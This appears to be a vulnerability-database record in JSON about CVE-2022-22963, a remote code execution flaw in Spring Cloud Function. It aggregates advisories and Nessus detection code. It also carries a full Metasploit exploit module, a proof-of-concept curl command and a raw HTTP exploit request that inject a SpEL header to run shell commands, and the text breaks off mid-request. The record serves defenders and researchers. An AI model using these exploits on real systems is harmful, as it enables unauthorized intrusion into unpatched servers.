[CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\nPlease review the information in the CVE report and upgrade immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T00:53:00", "type": "spring", "title": "CVE report published for Spring Cloud Function", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-30T00:53:00", "id": "SPRING:5D790268422545C1CFB6959B07261E50", "href": "https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-07-14T13:48:44", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "osv", "title": "Spring Cloud Function Code Injection with a specially crafted SpEL as a routing expression", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-14T13:47:04", "id": "OSV:GHSA-6V73-FGF6-W5J7", "href": "https://osv.dev/vulnerability/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:21", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n", "cvss3": {}, "published": "2022-03-30T22:38:41", "type": "metasploit", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T13:01:08", "id": "MSF:EXPLOIT-MULTI-HTTP-SPRING_CLOUD_FUNCTION_SPEL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_cloud_function_spel_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_cloud_function_spel_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-04-07T03:29:32", "description": "A remote code execution vulnerability exists in Spring Cloud Function. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Cloud Function Remote Code Execution (CVE-2022-22963)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "CPAI-2022-0096", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wizblog": [{"lastseen": "2023-07-21T20:20:00", "description": "Learn how to address Spring4Shell and CVE-2022-22963 RCE vulnerabilities in cloud environments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T05:00:39", "type": "wizblog", "title": "Addressing the Spring4Shell and CVE-2022-22963 RCE vulnerabilities in cloud environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-01T05:00:39", "id": "WIZBLOG:E7BB6906DDEB4849A11E483EC9AE559E", "href": "https://www.wiz.io/blog/addressing-recent-spring4shell-and-cve-2022-22963-rce-vulnerabilities-with-wiz", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "When using routing functionality in VMware Tanzu's Spring Cloud Function, it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "cisa_kev", "title": "VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-08-25T00:00:00", "id": "CISA-KEV-CVE-2022-22963", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-09-26T15:32:12", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function SPEL Expression Injection (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CLOUD_CVE-2022-22963.NBIN", "href": "https://www.tenable.com/plugins/nessus/159375", "sourceData": "Binary data spring_cloud_CVE-2022-22963.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:29", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-23T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CVE-2022-22963_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159730", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159730);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-22963\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in\nthe routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in remote code execution on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22963\");\n # https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cb5cd5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/hktalent/spring-spel-0day-poc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Cloud Function version 3.1.7 or 3.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Cloud Function SpEL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_cloud_function\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_spring_cloud_function_installed.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Cloud Function');\n\nvar constraints = [\n {'fixed_version' : '3.1.7'},\n {'min_version' : '3.2', 'fixed_version' : '3.2.3'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2023-07-21T20:47:19", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n \n\n\nTo run the [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) SpringBoot application run this docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) [exposing](<https://www.kitploit.com/search/label/Exposing> \"exposing\" ) it to port 8080. Example:\n \n \n docker run -it -d -p 8080:8080 bobcheat/springboot-public \n \n\n## Exploit\n\nCurl command:\n \n \n curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/test\")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' \n \n\nOr using [Burp](<https://www.kitploit.com/search/label/Burp> \"Burp\" ) suite:\n\n[](<https://github.com/darryk10/CVE-2022-22963/blob/main/burp-suite-exploit.png> \"$ \\(5\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n## Credits\n\n<https://github.com/hktalent/spring-spel-0day-poc>\n\n \n \n\n\n**[Download CVE-2022-22963](<https://github.com/darryk10/CVE-2022-22963> \"Download CVE-2022-22963\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:30:00", "type": "kitploit", "title": "CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:30:00", "id": "KITPLOIT:7586926896865819908", "href": "http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:47:11", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. -p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \">\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. \n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: <http://linkedin.com/in/infosecmazinahmed>\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-07-23T02:21:56", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 30, 2022 8:46pm UTC reported:\n\nCVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.\n\nThe cause of this vulnerability is an unsafe evaluation context for the [Spring Expression Language (SpEL)](<https://docs.spring.io/spring-framework/docs/3.2.x/spring-framework-reference/html/expressions.html>) that can be included in the `spring.cloud.function.routing-expression` header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.\n\nOne early PoC demonstrated that the SpEL query could be used to execute an OS command through the Java Runtime. The following example echos to the `/tmp/success` file. It differs from the original by using an array of strings for the arguments passed to `exec`. Because the header value is an SpEL query, single quotes should be [escaped by doubling them](<https://docs.spring.io/spring-cloud-dataflow/docs/1.2.3.RELEASE/reference/html/shell-white-space.html#CO10-2>).\n \n \n POST /functionRouter HTTP/1.1\n Host: 192.168.159.128:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69\n spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo \"hello world\" 